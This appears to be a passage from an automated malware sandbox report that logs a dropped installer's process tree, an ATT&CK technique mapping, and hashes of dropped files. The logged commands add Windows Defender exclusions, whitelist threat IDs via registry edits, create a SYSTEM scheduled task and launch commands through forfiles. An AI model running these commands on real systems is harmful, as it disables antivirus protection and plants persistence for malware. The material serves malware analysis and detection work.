        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5736
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5508
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 06:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS90F5.tmp\Install.exe\" it /toKdidOPbl 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5916
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:6176
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:6300
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:6380
- - C:\Users\Admin\Pictures\y5ehIzpWgSNs1PgS6tel86nE.exe
    "C:\Users\Admin\Pictures\y5ehIzpWgSNs1PgS6tel86nE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4708
  - - C:\Users\Admin\AppData\Local\Temp\7zS9105.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of WriteProcessMemory
      PID:4328
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:888
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:3716
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:4216
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:4532
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:2744
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:5200
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:5216
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5288
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:5304
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5508
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:5336
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:6116
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:6168
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 06:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9105.tmp\Install.exe\" it /hCfdidEgHI 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4940
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:6352
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:6408
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:6432
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
  2⤵
  PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3876 -ip 3876
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4004 -ip 4004
1⤵
PID:2472

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5440

C:\Users\Admin\AppData\Local\Temp\7zS9105.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS9105.tmp\Install.exe it /hCfdidEgHI 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6608
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6712
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6724
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6748
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:7012
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:7032
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:7048
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:7120
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:7136
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6072
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5564
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:3424
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5888
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5912
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        
        PID:6104
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5660
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5316
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:928

C:\Users\Admin\AppData\Local\Temp\7zS9105.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS9105.tmp\Install.exe it /hCfdidEgHI 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6628
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6736
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6808
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6832
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:7064
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:7076
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:7092
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:7152
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:7164
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5368
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6216
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5908
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5840
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4576
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6168
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        
        PID:4556
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1d7f3d1036cc09d2b9c5d8d5acfbb867

SHA1
5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85

SHA256
0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c

SHA512
dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
21KB

MD5
b7c6584908c6ddc86d2b913bfe5fbeca

SHA1
f7876364b78e5dcf82a48832798d598a86f31130

SHA256
16adebd05e26e2fae5d3145f9b1062b3109cef11ff8517af3af65bfbe5edc67f

SHA512
daad9fb8d18871d3ca3ba414cb205be801b429f6ad783451da98a5ab3d0c3b79e90105757b82a9c8f24d3ff0ed377ec50fe571dbfcd24f39b1677623791a6917

Download Submit
